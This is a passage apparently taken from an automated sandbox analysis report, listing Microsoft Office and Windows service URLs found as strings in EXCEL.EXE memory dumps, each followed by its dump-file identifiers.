00000000.00000003.845405435.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885769597.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.729296626.0000000012BE4000.00000004.00000001.sdmp, 630E636C-6B0C-44EA-BF33-295CC8DCC16C.0.drString found in binary or memory: https://entitlement.diagnosticssdf.office.com
    Source: EXCEL.EXE, 00000000.00000003.793618295.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.983087003.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712879748.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829418117.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656628398.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656351253.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844070824.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843276855.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728748048.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792166037.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.845405435.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885769597.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.729296626.0000000012BE4000.00000004.00000001.sdmpString found in binary or memory: https://entity.osi.office.net/t
    Source: EXCEL.EXE, EXCEL.EXE, 00000000.00000003.656171574.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656420136.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.887182746.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829507142.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.975433720.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843028954.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712989878.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843831700.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844821689.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728814839.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.791886378.0000000012A88000.00000004.00000001.sdmp, 630E636C-6B0C-44EA-BF33-295CC8DCC16C.0.drString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
    Source: EXCEL.EXE, 00000000.00000003.656171574.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656420136.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.887182746.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829507142.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.975433720.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843028954.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712989878.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843831700.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844821689.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728814839.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.791886378.0000000012A88000.00000004.00000001.sdmpString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechN4
    Source: 630E636C-6B0C-44EA-BF33-295CC8DCC16C.0.drString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
    Source: EXCEL.EXE, 00000000.00000002.981507571.0000000012880000.00000004.00000001.sdmpString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-androidR
    Source: EXCEL.EXE, 00000000.00000003.793618295.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656113776.0000000012A2F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.983087003.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712879748.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829418117.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656628398.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656351253.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844070824.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728506712.0000000012A23000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843276855.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728748048.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792166037.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.845405435.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885769597.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.729296626.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712940774.0000000012A23000.00000004.00000001.sdmp, 630E636C-6B0C-44EA-BF33-295CC8DCC16C.0.drString found in binary or memory: https://globaldisco.crm.dynamics.com
    Source: EXCEL.EXE, 00000000.00000003.793618295.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.983087003.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712879748.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829418117.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656628398.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656351253.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844070824.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843276855.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728748048.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792166037.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.845405435.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885769597.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.729296626.0000000012BE4000.00000004.00000001.sdmp, 630E636C-6B0C-44EA-BF33-295CC8DCC16C.0.drString found in binary or memory: https://graph.ppe.windows.net
    Source: 630E636C-6B0C-44EA-BF33-295CC8DCC16C.0.drString found in binary or memory: https://graph.ppe.windows.net/
    Source: EXCEL.EXE, 00000000.00000003.793618295.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.983087003.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712879748.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829418117.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656628398.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656351253.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844070824.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843276855.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728748048.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792166037.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.845405435.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885769597.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.729296626.0000000012BE4000.00000004.00000001.sdmpString found in binary or memory: https://graph.ppe.windows.net/w6
    Source: EXCEL.EXE, 00000000.00000003.793618295.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.983087003.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712879748.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829418117.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656628398.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656351253.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844070824.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843276855.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728748048.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792166037.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.845405435.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885769597.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.729296626.0000000012BE4000.00000004.00000001.sdmp, 630E636C-6B0C-44EA-BF33-295CC8DCC16C.0.drString found in binary or memory: https://graph.windows.net
    Source: EXCEL.EXE, 00000000.00000003.793618295.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.983087003.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712879748.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829418117.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656628398.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656351253.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844070824.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843276855.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728748048.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792166037.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.845405435.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885769597.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.729296626.0000000012BE4000.00000004.00000001.sdmp, 630E636C-6B0C-44EA-BF33-295CC8DCC16C.0.drString found in binary or memory: https://graph.windows.net/
    Source: EXCEL.EXE, 00000000.00000003.793618295.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.983087003.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712879748.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829418117.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656628398.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656351253.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844070824.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843276855.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728748048.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792166037.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.845405435.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885769597.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.729296626.0000000012BE4000.00000004.00000001.sdmpString found in binary or memory: https://graph.windows.net/ee
    Source: EXCEL.EXE, 00000000.00000003.793618295.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.983087003.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712879748.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829418117.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656628398.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656351253.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844070824.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843276855.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728748048.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792166037.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.845405435.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885769597.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.729296626.0000000012BE4000.00000004.00000001.sdmpString found in binary or memory: https://hubble.officeapps.live.com
    Source: EXCEL.EXE, 00000000.00000003.793618295.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.983087003.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712879748.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829418117.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656628398.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656351253.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844070824.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843276855.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728748048.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792166037.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.845405435.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885769597.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.729296626.0000000012BE4000.00000004.00000001.sdmpString found in binary or memory: https://hubble.officeapps.live.comE%
    Source: EXCEL.EXE, 00000000.00000003.793618295.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.983087003.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712879748.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829418117.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656628398.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656351253.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844070824.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843276855.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728748048.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792166037.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.845405435.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885769597.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.729296626.0000000012BE4000.00000004.00000001.sdmpString found in binary or memory: https://hubble.officeapps.live.comp%
    Source: EXCEL.EXE, 00000000.00000002.981591144.00000000128C3000.00000004.00000001.sdmp, 630E636C-6B0C-44EA-BF33-295CC8DCC16C.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
    Source: EXCEL.EXE, 00000000.00000002.980136152.000000000D3AC000.00000004.00000001.sdmpString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetryC
    Source: 630E636C-6B0C-44EA-BF33-295CC8DCC16C.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
    Source: EXCEL.EXE, 00000000.00000002.981660434.00000000128EC000.00000004.00000001.sdmpString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?-
    Source: EXCEL.EXE, 00000000.00000002.980136152.000000000D3AC000.00000004.00000001.sdmpString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?MBI_SSL_SHORTssl.
    Source: EXCEL.EXE, 00000000.00000003.793618295.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.983087003.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712879748.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829418117.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656628398.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656351253.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844070824.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843276855.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728748048.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792166037.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.845405435.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885769597.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.729296626.0000000012BE4000.00000004.00000001.sdmp, 630E636C-6B0C-44EA-BF33-295CC8DCC16C.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
    Source: 630E636C-6B0C-44EA-BF33-295CC8DCC16C.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&amp;premium=1
    Source: EXCEL.EXE, 00000000.00000002.981507571.0000000012880000.00000004.00000001.sdmpString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
    Source: 630E636C-6B0C-44EA-BF33-295CC8DCC16C.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&amp;premium=1
    Source: EXCEL.EXE, 00000000.00000002.981660434.00000000128EC000.00000004.00000001.sdmpString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
    Source: 630E636C-6B0C-44EA-BF33-295CC8DCC16C.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&amp;premium=1
    Source: EXCEL.EXE, 00000000.00000002.981660434.00000000128EC000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.980136152.000000000D3AC000.00000004.00000001.sdmpString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
    Source: EXCEL.EXE, 00000000.00000002.981591144.00000000128C3000.00000004.00000001.sdmp, 630E636C-6B0C-44EA-BF33-295CC8DCC16C.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
    Source: EXCEL.EXE, 00000000.00000002.980136152.000000000D3AC000.00000004.00000001.sdmpString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?OfficeOnlineContentM365Iconshttps://hu
    Source: EXCEL.EXE, 00000000.00000003.793618295.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656113776.0000000012A2F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.983087003.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712879748.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829418117.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656628398.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656351253.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844070824.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843276855.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728748048.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792166037.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.845405435.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885769597.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.729296626.0000000012BE4000.00000004.00000001.sdmp, 630E636C-6B0C-44EA-BF33-295CC8DCC16C.0.drString found in binary or memory: https://incidents.diagnostics.office.com
    Source: EXCEL.EXE, 00000000.00000003.793618295.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656113776.0000000012A2F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.983087003.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712879748.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829418117.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656628398.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656351253.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844070824.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843276855.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728748048.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792166037.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.845405435.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885769597.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.729296626.0000000012BE4000.00000004.00000001.sdmp, 630E636C-6B0C-44EA-BF33-295CC8DCC16C.0.drString found in binary or memory: https://incidents.diagnosticssdf.office.com
    Source: 630E636C-6B0C-44EA-BF33-295CC8DCC16C.0.drString found in binary or memory: https://inclient.store.office.com/gyro/client
    Source: EXCEL.EXE, 00000000.00000003.793618295.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.983087003.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712879748.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829418117.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656628398.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656351253.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844070824.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843276855.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728748048.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792166037.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.845405435.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885769597.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.729296626.0000000012BE4000.00000004.00000001.sdmpString found in binary or memory: https://inclient.store.office.com/gyro/clientla
    Source: 630E636C-6B0C-44EA-BF33-295CC8DCC16C.0.drString found in binary or memory: https://inclient.store.office.com/gyro/clientstore
    Source: EXCEL.EXE, 00000000.00000003.793618295.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.983087003.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712879748.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829418117.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656628398.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656351253.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844070824.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843276855.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728748048.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792166037.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.845405435.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885769597.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.729296626.0000000012BE4000.00000004.00000001.sdmpString found in binary or memory: https://inclient.store.office.com/gyro/clientstoreGV
    Source: EXCEL.EXE, 00000000.00000003.793618295.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.983087003.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712879748.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829418117.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656628398.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656351253.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844070824.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843276855.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728748048.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792166037.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.845405435.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885769597.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.729296626.0000000012BE4000.00000004.00000001.sdmpString found in binary or memory: https://inclient.store.office.com/gyro/clientstoret
    Source: EXCEL.EXE, 00000000.00000002.981507571.0000000012880000.00000004.00000001.sdmpString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=ImmersiveApp
    Source: 630E636C-6B0C-44EA-BF33-295CC8DCC16C.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&amp;adlt=strict&amp;hostType=Immersive
    Source: EXCEL.EXE, 630E636C-6B0C-44EA-BF33-295CC8DCC16C.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
    Source: EXCEL.EXE, 00000000.00000002.980136152.000000000D3AC000.00000004.00000001.sdmpString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=BingMBI_SSL_SHORTssl.
    Source: EXCEL.EXE, 00000000.00000003.656171574.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656420136.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.887182746.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829507142.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.975433720.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843028954.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712989878.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843831700.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844821689.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728814839.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.791886378.0000000012A88000.00000004.00000001.sdmpString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bingz1
    Source: EXCEL.EXE, 00000000.00000003.830019835.000000000F1AC000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.887114579.000000000F1AC000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792860605.000000000F1AC000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844384510.000000000F1AC000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.976497308.000000000F1AC000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.846187037.000000000F1AC000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.847870583.000000000F1AC000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.831076747.000000000F1AC000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728160281.000000000F1AC000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843428711.000000000F1AC000.00000004.00000001.sdmp, 630E636C-6B0C-44EA-BF33-295CC8DCC16C.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
    Source: EXCEL.EXE, 00000000.00000002.980136152.000000000D3AC000.00000004.00000001.sdmpString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArtOfficeOnlineContentF
